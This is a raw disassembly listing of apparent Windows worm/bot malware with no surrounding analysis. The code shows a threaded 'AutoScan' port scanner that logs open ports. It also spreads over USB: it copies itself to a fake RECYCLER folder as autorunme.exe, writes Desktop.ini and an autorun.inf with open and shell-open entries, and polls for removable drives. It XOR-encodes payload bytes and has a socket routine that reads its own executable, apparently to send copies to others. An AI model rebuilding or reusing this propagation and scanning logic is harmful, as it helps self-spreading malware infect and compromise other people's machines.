lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_40C2A6 ; memcpy
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_40AAF2 endp
; ---------------------------------------------------------------------------
db 12h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AB4C proc near ; CODE XREF: sub_40101E�j
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push edi
or edi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], edi
mov [ebp+var_8], edi
mov [ebp+var_4], edi
mov [ebp+var_10], edi
call sub_40C28E ; strlen
cmp eax, 0Fh
pop ecx
jbe short loc_40AB74
xor eax, eax
jmp short loc_40ABE2
; ---------------------------------------------------------------------------
loc_40AB74: ; CODE XREF: sub_40AB4C+22�j
lea eax, [ebp+var_10]
push esi
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call ds:dword_47B5B8 ; sscanf
mov esi, ds:dword_47B5EC
add esp, 18h
cmp [ebp+var_C], edi
jnz short loc_40ABA6
call esi ; dword_47B5EC
mov [ebp+var_C], eax
loc_40ABA6: ; CODE XREF: sub_40AB4C+53�j
cmp [ebp+var_8], edi
jnz short loc_40ABB0
call esi ; dword_47B5EC
mov [ebp+var_8], eax
loc_40ABB0: ; CODE XREF: sub_40AB4C+5D�j
cmp [ebp+var_4], edi
jnz short loc_40ABBA
call esi ; dword_47B5EC
mov [ebp+var_4], eax
loc_40ABBA: ; CODE XREF: sub_40AB4C+67�j
mov eax, [ebp+var_10]
cmp eax, edi
jnz short loc_40ABC3
call esi ; dword_47B5EC
loc_40ABC3: ; CODE XREF: sub_40AB4C+73�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
pop esi
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov dword_4792C8[ecx*8], eax
loc_40ABE2: ; CODE XREF: sub_40AB4C+26�j
pop edi
leave
retn
sub_40AB4C endp
; ---------------------------------------------------------------------------
db 26h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AC0B proc near ; CODE XREF: sub_40123A�j
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push offset dword_4136BC
push [ebp+arg_0]
call dword_413F48 ; inet_ntoa
push eax
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40ACDD
push offset dword_4137E8
push [ebp+arg_0]
call dword_413F48 ; inet_ntoa
push eax
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40ACDD
push 1
xor ebx, ebx
pop edi
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_413F3C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40ACDD
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_413E98 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_413F60 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_413E14 ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_413E74 ; select
push esi
mov edi, eax
call dword_413F5C ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
jmp short loc_40ACDF
; ---------------------------------------------------------------------------
loc_40ACDD: ; CODE XREF: sub_40AC0B+24�j
; sub_40AC0B+42�j ...
xor eax, eax
loc_40ACDF: ; CODE XREF: sub_40AC0B+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40AC0B endp
; ---------------------------------------------------------------------------
db 36h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AD1A proc near ; CODE XREF: sub_401307�j
var_CC = byte ptr -0CCh
var_BC = byte ptr -0BCh
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 33h
mov esi, eax
pop ecx
lea edi, [ebp+var_CC]
push 1
pop ebx
rep movsd
mov ecx, [ebp+var_4]
mov [eax+0C0h], ebx
lea eax, [ebp+var_CC]
mov [ebp+arg_0], ecx
push eax
call dword_413EE8 ; inet_addr
push [ebp+var_4]
mov ecx, [ebp+var_30]
lea esi, [ebp+var_CC]
sub esp, 0CCh
mov dword_4792C8[ecx*8], eax
push 33h
pop ecx
mov edi, esp
rep movsd
call sub_4010F5
push 7
call sub_4010AF
add esp, 0D4h
cmp eax, ebx
jnz short loc_40ADD0
mov esi, offset dword_47A2C8
push esi
call ds:dword_47B468 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_47B46C ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_40ADD0
cmp [ebp+var_1C], eax
jnz short loc_40ADC7
call ds:dword_47B4E4 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_BC]
push offset aFailedToInitia ; "Failed to initialize critical section, "...
push eax
push [ebp+arg_0]
call sub_40104B
add esp, 10h
loc_40ADC7: ; CODE XREF: sub_40AD1A+8D�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_40ADD0: ; CODE XREF: sub_40AD1A+6C�j
; sub_40AD1A+88�j
mov eax, [ebp+var_30]
cmp [ebp+var_24], ebx
mov esi, ds:dword_47B4EC
mov edi, ebx
mov dword_4792CC[eax*8], ebx
jb short loc_40AE5A
loc_40ADE7: ; CODE XREF: sub_40AD1A+13E�j
push edi
lea eax, [ebp+var_CC]
push [ebp+var_30]
mov [ebp+var_28], edi
push [ebp+var_3C]
push eax
push offset aSDScanThreadDS ; "-%s:%d, Scan thread: %d, Sub-thread: %d"...
push 7
call sub_401073
mov [ebp+var_2C], eax
imul eax, 220h
mov ecx, [ebp+var_30]
add esp, 18h
mov dword_427628[eax], ecx
xor eax, eax
push eax
lea ecx, [ebp+var_CC]
push eax
push ecx
push offset loc_401271
push eax
push eax
call ds:dword_47B4DC ; CreateThread
mov ecx, [ebp+var_2C]
imul ecx, 220h
test eax, eax
mov dword_427630[ecx], eax
jz short loc_40AE50
loc_40AE44: ; CODE XREF: sub_40AD1A+134�j
cmp [ebp+var_8], 0
jnz short loc_40AE50
push 1Eh
call esi ; dword_47B4EC
jmp short loc_40AE44
; ---------------------------------------------------------------------------
loc_40AE50: ; CODE XREF: sub_40AD1A+128�j
; sub_40AD1A+12E�j
push 1Eh
call esi ; dword_47B4EC
inc edi
cmp edi, [ebp+var_24]
jbe short loc_40ADE7
loc_40AE5A: ; CODE XREF: sub_40AD1A+CB�j
xor edi, edi
cmp [ebp+var_34], edi
jz short loc_40AEDE
mov eax, [ebp+var_34]
imul eax, 0EA60h
push eax
call esi ; dword_47B4EC
loc_40AE6D: ; CODE XREF: sub_40AD1A+1CE�j
mov eax, [ebp+var_30]
cmp [ebp+var_1C], edi
mov eax, dword_4792C8[eax*8]
jnz short loc_40AEA6
cmp [ebp+var_18], edi
jz short loc_40AEA6
push [ebp+var_34]
push [ebp+var_3C]
push eax
call dword_413F48 ; inet_ntoa
push eax
lea eax, [ebp+var_BC]
push offset aFinishedAtSDAf ; "Finished at %s:%d after %d minute(s) of"...
push eax
push [ebp+arg_0]
call sub_40104B
add esp, 18h
loc_40AEA6: ; CODE XREF: sub_40AD1A+160�j
; sub_40AD1A+165�j
mov eax, [ebp+var_30]
push 0BB8h
mov dword_4792CC[eax*8], edi
call esi ; dword_47B4EC
push 7
call sub_4010AF
cmp eax, ebx
pop ecx
jnz short loc_40AECE
push offset dword_47A2C8
call ds:dword_47B468 ; RtlDeleteCriticalSection
loc_40AECE: ; CODE XREF: sub_40AD1A+1A7�j
push [ebp+var_30]
call sub_401235
pop ecx
push edi
call ds:dword_47B4C4 ; ExitThread
loc_40AEDE: ; CODE XREF: sub_40AD1A+145�j
; sub_40AD1A+1D7�j
mov eax, [ebp+var_30]
cmp dword_4792CC[eax*8], ebx
jnz short loc_40AE6D
push 7D0h
call esi ; dword_47B4EC
jmp short loc_40AEDE
sub_40AD1A endp
; ---------------------------------------------------------------------------
db 76h dup(0CCh)
; ---------------------------------------------------------------------------
loc_40AF69: ; CODE XREF: UPX0:loc_401271�j
push ebp
mov ebp, esp
sub esp, 1C4h
mov eax, [ebp+8]
push ebx
push esi
push edi
push 33h
mov esi, eax
pop ecx
lea edi, [ebp-0D8h]
rep movsd
mov ecx, [ebp-10h]
mov esi, [ebp-38h]
mov [ebp-4], ecx
mov dword ptr [eax+0C4h], 1
mov [ebp-0Ch], esi
call ds:dword_47B4E8 ; GetTickCount
push eax
call ds:dword_47B5F8 ; srand
mov eax, esi
pop ecx
imul eax, 220h
lea edi, dword_427628[eax]
mov [ebp-8], edi
mov eax, [edi]
cmp dword_4792CC[eax*8], 0
jz loc_40B101
mov ebx, ds:dword_47B5FC
loc_40AFD0: ; CODE XREF: UPX0:0040B0FB�j
cmp dword ptr [ebp-20h], 0
push eax
jz short loc_40AFE6
lea eax, [ebp-0D8h]
push eax
call sub_40101E
pop ecx
jmp short loc_40AFEB
; ---------------------------------------------------------------------------
loc_40AFE6: ; CODE XREF: UPX0:0040AFD5�j
call sub_40127B
loc_40AFEB: ; CODE XREF: UPX0:0040AFE4�j
pop ecx
mov [ebp+8], eax
push dword ptr [ebp-44h]
push dword ptr [ebp-48h]
push eax
call sub_40123A
add esp, 0Ch
cmp eax, 1
jnz loc_40B0E6
cmp dword ptr [ebp-2Ch], 0FFFFFFFFh
jnz short loc_40B052
push offset dword_47A2C8
call ds:dword_47B460 ; RtlEnterCriticalSection
cmp dword ptr [ebp-28h], 0
jnz short loc_40B042
push dword ptr [ebp-48h]
push dword ptr [ebp+8]
call dword_413F48 ; inet_ntoa
push eax
lea eax, [ebp-0C8h]
push offset aPortscanSDOpen ; "Portscan: %s:%d open."
push eax
push dword ptr [ebp-4]
call sub_40104B
add esp, 14h
loc_40B042: ; CODE XREF: UPX0:0040B01C�j
push offset dword_47A2C8
call ds:dword_47B464 ; RtlLeaveCriticalSection
jmp loc_40B0E6
; ---------------------------------------------------------------------------
loc_40B052: ; CODE XREF: UPX0:0040B00B�j
push dword ptr [ebp+8]
call dword_413F48 ; inet_ntoa
push eax
lea eax, [ebp-1C4h]
push eax
call ebx ; dword_47B5FC
mov eax, [ebp-2Ch]
imul eax, 3Ch
add eax, offset aS_0 ; "s"
push eax
lea eax, [ebp-130h]
push eax
call ebx ; dword_47B5FC
lea eax, [ebp-0C8h]
push eax
lea eax, [ebp-1B4h]
push eax
call ebx ; dword_47B5FC
mov eax, [ebp-28h]
sub esp, 0D4h
mov [ebp-10Ch], eax
mov eax, [ebp-24h]
mov [ebp-108h], eax
mov eax, [ebp-48h]
mov [ebp-120h], eax
mov eax, [ebp-2Ch]
mov [ebp-118h], eax
imul eax, 3Ch
push 3Bh
mov [ebp-11Ch], esi
pop ecx
lea esi, [ebp-1C4h]
mov edi, esp
push dword ptr [ebp-4]
rep movsd
lea ecx, [ebp-0C8h]
push ecx
call off_412E4C[eax]
mov esi, [ebp-0Ch]
mov edi, [ebp-8]
add esp, 0F4h
loc_40B0E6: ; CODE XREF: UPX0:0040B001�j
; UPX0:0040B04D�j
push 7D0h
call ds:dword_47B4EC ; Sleep
mov eax, [edi]
cmp dword_4792CC[eax*8], 0
jnz loc_40AFD0
loc_40B101: ; CODE XREF: UPX0:0040AFC4�j
push esi
call sub_401235
pop ecx
push 0
call ds:dword_47B4C4 ; ExitThread
; ---------------------------------------------------------------------------
db 69h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B179 proc near ; CODE XREF: sub_401028�j
var_CC = byte ptr -0CCh
var_BC = byte ptr -0BCh
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 0CCh
or [ebp+var_20], 0FFFFFFFFh
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
cmp dword_412E48, edi
mov [ebp+var_24], 50h
mov [ebp+var_38], 4
mov [ebp+var_34], edi
jz short loc_40B1D9
mov esi, offset dword_412E48
loc_40B1AB: ; CODE XREF: sub_40B179+4B�j
lea eax, [esi-30h]
push offset aS_2 ; "s"
push eax
call ds:dword_47B4E0 ; lstrcmpiA
test eax, eax
jz short loc_40B1C8
add esi, 3Ch
inc ebx
cmp [esi], edi
jnz short loc_40B1AB
jmp short loc_40B1D9
; ---------------------------------------------------------------------------
loc_40B1C8: ; CODE XREF: sub_40B179+43�j
mov eax, ebx
mov [ebp+var_20], ebx
imul eax, 3Ch
mov eax, dword_412E48[eax]
mov [ebp+var_3C], eax
loc_40B1D9: ; CODE XREF: sub_40B179+2B�j
; sub_40B179+4D�j
push 2
push edi
push offset dword_4137E8
mov [ebp+var_14], edi
call sub_4010A0
add esp, 0Ch
cmp eax, edi
jz short loc_40B203
push 10h
push eax
lea eax, [ebp+var_CC]
push eax
call ds:dword_47B614 ; strncpy
add esp, 0Ch
loc_40B203: ; CODE XREF: sub_40B179+75�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, dword_413814
imul eax, 188h
add eax, offset word_40FD72
push eax
lea eax, [ebp+var_BC]
push eax
call sub_40C25E ; strcpy
cmp [ebp+var_14], edi
pop ecx
pop ecx
mov eax, offset aRandom ; "Random"
jnz short loc_40B237
mov eax, offset aSequential ; "Sequential"
loc_40B237: ; CODE XREF: sub_40B179+B7�j
push [ebp+var_24]
lea ecx, [ebp+var_CC]
push [ebp+var_34]
push [ebp+var_38]
push [ebp+var_3C]
push ecx
push eax
push offset aSAutoscanStart ; "%s -AutoScan- started on %s:%d with a d"...
push 8
call sub_401073
add esp, 20h
mov [ebp+var_30], eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_CC]
push edi
push eax
push offset sub_401307
push edi
push edi
call ds:dword_47B4DC ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 220h
cmp eax, edi
mov dword_427630[ecx], eax
jz short loc_40B298
loc_40B289: ; CODE XREF: sub_40B179+11D�j
cmp [ebp+var_C], edi
jnz short loc_40B298
push 32h
call ds:dword_47B4EC ; Sleep
jmp short loc_40B289
; ---------------------------------------------------------------------------
loc_40B298: ; CODE XREF: sub_40B179+10E�j
; sub_40B179+113�j
push 1
pop eax
pop edi
pop esi
pop ebx
leave
retn
sub_40B179 endp
; ---------------------------------------------------------------------------
db 49h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40B2E9 proc near ; CODE XREF: sub_401131�j
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_40B2F2
inc ecx
loc_40B2F2: ; CODE XREF: sub_40B2E9+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_40B2E9 endp
; ---------------------------------------------------------------------------
db 6 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B30A proc near ; CODE XREF: sub_4011D6�j
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_C]
cmp cl, 0Ah
jz short loc_40B333
cmp cl, 0Dh
jz short loc_40B333
cmp cl, 5Ch
jz short loc_40B333
test cl, cl
jz short loc_40B333
cmp cl, 5Fh
jz short loc_40B333
cmp cl, 2Fh
jz short loc_40B333
cmp cl, 2Eh
jnz short loc_40B337
loc_40B333: ; CODE XREF: sub_40B30A+A�j
; sub_40B30A+F�j ...
inc ecx
mov [ebp+arg_C], ecx
loc_40B337: ; CODE XREF: sub_40B30A+27�j
push esi
mov esi, 0FFh
cmp ecx, esi
jbe short loc_40B36B
mov eax, ecx
shr eax, 8
cmp al, 0Ah
jz short loc_40B362
cmp al, 0Dh
jz short loc_40B362
cmp al, 5Ch
jz short loc_40B362
test al, al
jz short loc_40B362
cmp al, 5Fh
jz short loc_40B362
cmp al, 2Fh
jz short loc_40B362
cmp al, 2Eh
jnz short loc_40B36B
loc_40B362: ; CODE XREF: sub_40B30A+3E�j
; sub_40B30A+42�j ...
add ecx, 100h
mov [ebp+arg_C], ecx
loc_40B36B: ; CODE XREF: sub_40B30A+35�j
; sub_40B30A+56�j
push ecx
call sub_401131
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_40B381
cmp eax, 0FFFFh
jbe short loc_40B388
loc_40B381: ; CODE XREF: sub_40B30A+6E�j
xor eax, eax
jmp loc_40B432
; ---------------------------------------------------------------------------
loc_40B388: ; CODE XREF: sub_40B30A+75�j
mov ecx, [ebp+arg_C]
push ebx
mov bl, ds:byte_47A730
xor edx, edx
push edi
mov edi, [ebp+arg_8]
test ecx, ecx
jbe short loc_40B3C4
loc_40B39C: ; CODE XREF: sub_40B30A+B8�j
mov al, [edx+edi]
xor al, bl
jz short loc_40B3BB
cmp al, 0Ah
jz short loc_40B3BB
cmp al, 0Dh
jz short loc_40B3BB
cmp al, 5Ch
jz short loc_40B3BB
cmp al, 5Fh
jz short loc_40B3BB
cmp al, 2Fh
jz short loc_40B3BB
cmp al, 2Eh
jnz short loc_40B3BF
loc_40B3BB: ; CODE XREF: sub_40B30A+97�j
; sub_40B30A+9B�j ...
inc bl
xor edx, edx
loc_40B3BF: ; CODE XREF: sub_40B30A+AF�j
inc edx
cmp edx, ecx
jb short loc_40B39C
loc_40B3C4: ; CODE XREF: sub_40B30A+90�j
cmp ecx, esi
mov ds:byte_47A730, bl
ja short loc_40B3F0
push 15h
push offset loc_41309C
push [ebp+arg_0]
mov byte_4130A9, cl
mov byte_4130AD, bl
call sub_40C2A6 ; memcpy
add esp, 0Ch
push 15h
jmp short loc_40B411
; ---------------------------------------------------------------------------
loc_40B3F0: ; CODE XREF: sub_40B30A+C2�j
push 17h
push offset loc_413084
push [ebp+arg_0]
mov word_413092, cx
mov byte_413097, bl
call sub_40C2A6 ; memcpy
add esp, 0Ch
push 17h
loc_40B411: ; CODE XREF: sub_40B30A+E4�j
xor eax, eax
pop ecx
cmp [ebp+arg_C], eax
jbe short loc_40B42D
mov edx, [ebp+arg_0]
lea esi, [ecx+edx]
loc_40B41F: ; CODE XREF: sub_40B30A+121�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_40B41F
loc_40B42D: ; CODE XREF: sub_40B30A+10D�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_40B432: ; CODE XREF: sub_40B30A+79�j
pop esi
leave
retn
sub_40B30A endp
; ---------------------------------------------------------------------------
db 4Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B47F proc near ; CODE XREF: sub_40100A�j
var_410 = byte ptr -410h
var_40F = byte ptr -40Fh
var_20C = byte ptr -20Ch
var_20B = byte ptr -20Bh
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 410h
and [ebp+var_20C], 0
push ebx
push esi
mov edx, 80h
push edi
mov ecx, edx
xor eax, eax
lea edi, [ebp+var_20B]
rep stosd
and [ebp+var_410], 0
mov ecx, edx
stosb
xor eax, eax
lea edi, [ebp+var_40F]
push [ebp+arg_0]
mov esi, ds:dword_47B454
rep stosd
stosb
lea eax, [ebp+var_20C]
push eax
call esi ; dword_47B454
lea eax, [ebp+var_20C]
push offset aRecycler ; "\\RECYCLER"
push eax
call esi ; dword_47B454
mov edi, ds:dword_47B45C
lea eax, [ebp+var_20C]
push 0
push eax
call edi ; dword_47B45C
test eax, eax
jnz short loc_40B4FE
call ds:dword_47B4E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz loc_40B6C8
loc_40B4FE: ; CODE XREF: sub_40B47F+6C�j
mov ebx, ds:dword_47B4BC
lea eax, [ebp+var_20C]
push 7
push eax
call ebx ; dword_47B4BC
lea eax, [ebp+var_20C]
push offset aS1621243447650 ; "\\S-1-6-21-2434476501-1644491937-6000033"...
push eax
call esi ; dword_47B454
lea eax, [ebp+var_20C]
push 0
push eax
call edi ; dword_47B45C
test eax, eax
jnz short loc_40B53D
call ds:dword_47B4E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz loc_40B6C8
loc_40B53D: ; CODE XREF: sub_40B47F+AB�j
lea eax, [ebp+var_20C]
push 7
push eax
call ebx ; dword_47B4BC
lea eax, [ebp+var_20C]
push offset aDesktop_ini ; "\\Desktop.ini"
push eax
call esi ; dword_47B454
xor eax, eax
push eax
push 6
push 2
push eax
push eax
lea eax, [ebp+var_20C]
push 40000000h
push eax
call ds:dword_47B4C0 ; CreateFileA
mov edi, eax
cmp edi, 1
jb loc_40B6C8
lea eax, [ebp+var_8]
push 0
push eax
push 3Fh
push offset a_shellclassinf ; "[.ShellClassInfo]\r\nCLSID={645FF040-5081"...
push edi
call ds:dword_47B4D4 ; WriteFile
test eax, eax
jnz short loc_40B59B
xor esi, esi
jmp loc_40B6F4
; ---------------------------------------------------------------------------
loc_40B59B: ; CODE XREF: sub_40B47F+113�j
push edi
call ds:dword_47B520 ; CloseHandle
lea eax, [ebp+var_20C]
push eax
call ds:dword_47B488 ; lstrlenA
lea eax, [ebp+eax+var_20C]
loc_40B5B6: ; CODE XREF: sub_40B47F+13D�j
cmp byte ptr [eax], 5Ch
jz short loc_40B5BE
dec eax
jmp short loc_40B5B6
; ---------------------------------------------------------------------------
loc_40B5BE: ; CODE XREF: sub_40B47F+13A�j
and byte ptr [eax+1], 0
lea eax, [ebp+var_20C]
push offset aAutorunme_exe ; "autorunme.exe"
push eax
call esi ; dword_47B454
lea eax, [ebp+var_410]
push 201h
push eax
push 0
call ds:dword_47B510 ; GetModuleFileNameA
lea eax, [ebp+var_20C]
push 1
push eax
lea eax, [ebp+var_410]
push eax
call ds:dword_47B484 ; CopyFileA
mov [ebp+var_4], eax
lea eax, [ebp+var_20C]
push 7
push eax
call ebx ; dword_47B4BC
mov ecx, 80h
xor eax, eax
lea edi, [ebp+var_410]
cmp [ebp+var_20C], 5Ch
rep stosd
stosw
lea edi, [ebp+var_20C]
jz short loc_40B62E
loc_40B628: ; CODE XREF: sub_40B47F+1AD�j
inc edi
cmp byte ptr [edi], 5Ch
jnz short loc_40B628
loc_40B62E: ; CODE XREF: sub_40B47F+1A7�j
lea eax, [ebp+var_410]
push offset aAutorunOpen ; "[autorun]\r\nopen="
push eax
inc edi
call esi ; dword_47B454
lea eax, [ebp+var_410]
push edi
push eax
call esi ; dword_47B454
lea eax, [ebp+var_410]
push offset aIconSystemroot ; "\r\nicon=%SystemRoot%\\system32\\SHELL32.dl"...
push eax
call esi ; dword_47B454
lea eax, [ebp+var_410]
push edi
push eax
call esi ; dword_47B454
lea eax, [ebp+var_410]
push offset aShellOpenDefau ; "\r\nshell\\open\\default=1"
push eax
call esi ; dword_47B454
mov ecx, 80h
xor eax, eax
lea edi, [ebp+var_20C]
push [ebp+arg_0]
rep stosd
stosw
lea eax, [ebp+var_20C]
push eax
call esi ; dword_47B454
lea eax, [ebp+var_20C]
push offset dword_4130BC
push eax
call esi ; dword_47B454
lea eax, [ebp+var_20C]
push 80h
push eax
call ebx ; dword_47B4BC
xor esi, esi
lea eax, [ebp+var_20C]
push esi
push 7
push 2
push esi
push esi
push 40000000h
push eax
call ds:dword_47B4C0 ; CreateFileA
mov edi, eax
cmp edi, 1
jnb short loc_40B6CC
loc_40B6C8: ; CODE XREF: sub_40B47F+79�j
; sub_40B47F+B8�j ...
xor eax, eax
jmp short loc_40B6FD
; ---------------------------------------------------------------------------
loc_40B6CC: ; CODE XREF: sub_40B47F+247�j
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_410]
push eax
call ds:dword_47B488 ; lstrlenA
push eax
lea eax, [ebp+var_410]
push eax
push edi
call ds:dword_47B4D4 ; WriteFile
test eax, eax
jz short loc_40B6F4
mov esi, [ebp+var_4]
loc_40B6F4: ; CODE XREF: sub_40B47F+117�j
; sub_40B47F+270�j
push edi
call ds:dword_47B520 ; CloseHandle
mov eax, esi
loc_40B6FD: ; CODE XREF: sub_40B47F+24B�j
pop edi
pop esi
pop ebx
leave
retn
sub_40B47F endp
; ---------------------------------------------------------------------------
db 0A0h dup(0CCh)
; ---------------------------------------------------------------------------
loc_40B7A2: ; CODE XREF: UPX0:loc_40110E�j
push ebp
mov ebp, esp
sub esp, 2C4h
mov eax, [ebp+8]
push esi
push edi
and byte ptr [ebp-2C4h], 0
push 30h
mov esi, eax
pop ecx
lea edi, [ebp-0C0h]
rep movsd
mov dword ptr [eax+0BCh], 1
mov ecx, 80h
xor eax, eax
lea edi, [ebp-2C3h]
and byte ptr [ebp+0Ah], 0
mov byte ptr [ebp+8], 20h
rep stosd
stosb
mov byte ptr [ebp+9], 3Ah
loc_40B7EA: ; CODE XREF: UPX0:0040B809�j
; UPX0:0040B876�j
push 2EE0h
call ds:dword_47B4EC ; Sleep
lea eax, [ebp-2C4h]
push eax
push 201h
call ds:dword_47B44C ; GetLogicalDriveStringsA
test eax, eax
jz short loc_40B7EA
lea esi, [ebp-2C4h]
loc_40B811: ; CODE XREF: UPX0:0040B874�j
mov al, [esi]
cmp al, 41h
mov [ebp+8], al
jz short loc_40B86B
cmp al, 42h
jz short loc_40B86B
cmp al, 61h
jz short loc_40B86B
cmp al, 62h
jz short loc_40B86B
lea eax, [ebp+8]
push eax
call ds:dword_47B450 ; GetDriveTypeA
cmp eax, 2
jnz short loc_40B86B
lea eax, [ebp+8]
push eax
call sub_40100A
test eax, eax
pop ecx
jz short loc_40B86B
lea eax, [ebp+8]
push eax
mov eax, dword_413814
imul eax, 188h
add eax, offset word_40FD72
push offset dword_413238
push eax
push dword ptr [ebp-0C0h]
call sub_40104B
add esp, 10h
loc_40B86B: ; CODE XREF: UPX0:0040B818�j
; UPX0:0040B81C�j ...
mov al, [esi]
inc esi
test al, al
jnz short loc_40B86B
cmp [esi], al
jnz short loc_40B811
jmp loc_40B7EA
; ---------------------------------------------------------------------------
db 36h dup(0CCh)
; ---------------------------------------------------------------------------
loc_40B8B1: ; CODE XREF: UPX0:loc_401055�j
push ebp
mov ebp, esp
sub esp, 600h
mov eax, [ebp+8]
push ebx
push esi
push edi
push 30h
mov esi, eax
pop ecx
lea edi, [ebp-4FCh]
rep movsd
push 1
xor ebx, ebx
pop edi
push ebx
push 2
push 2
mov [eax+0BCh], edi
call ds:dword_47B708 ; socket
push 6
mov esi, eax
call sub_401226
imul eax, 220h
cmp esi, ebx
pop ecx
mov dword_427638[eax], esi
jnz short loc_40B904
push ebx
call ds:dword_47B4C4 ; ExitThread
loc_40B904: ; CODE XREF: UPX0:0040B8FB�j
push edi
push 45h
push 6
call sub_401226
imul eax, 220h
pop ecx
push dword_427638[eax]
call sub_401127
add esp, 0Ch
test al, al
jnz short loc_40B92E
push ebx
call ds:dword_47B4C4 ; ExitThread
loc_40B92E: ; CODE XREF: UPX0:0040B925�j
lea eax, [ebp-600h]
push 104h
push eax
push ebx
call ds:dword_47B510 ; GetModuleFileNameA
test eax, eax
jz loc_40BBB8
lea eax, [ebp-600h]
push offset dword_4132C0
push eax
call ds:dword_47B580 ; fopen
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+8], eax
jz loc_40BBB8
mov edi, ds:dword_47B744
mov esi, 200h
loc_40B973: ; CODE XREF: UPX0:0040B9D3�j
; UPX0:0040BAAF�j ...
push 6
mov dword ptr [ebp-10h], 5
mov dword ptr [ebp-0Ch], 1388h
mov [ebp-43Ch], ebx
call sub_401226
imul eax, 220h
inc dword ptr [ebp-43Ch]
mov dword ptr [esp], 104h
mov eax, dword_427638[eax]
push ebx
mov [ebp-438h], eax
lea eax, [ebp-338h]
push eax
call sub_40C294 ; memset
add esp, 0Ch
lea eax, [ebp-10h]
push eax
push ebx
lea eax, [ebp-43Ch]
push ebx
push eax
push ebx
call ds:dword_47B710 ; select
test eax, eax
jz short loc_40B973
lea eax, [ebp-4]
mov dword ptr [ebp-4], 10h
push eax
lea eax, [ebp-20h]
push eax
push ebx
lea eax, [ebp-338h]
push 104h
push eax
push 6
call sub_401226
imul eax, 220h
pop ecx
push dword_427638[eax]
call ds:dword_47B714 ; recvfrom
test eax, eax
jz loc_40BBB1
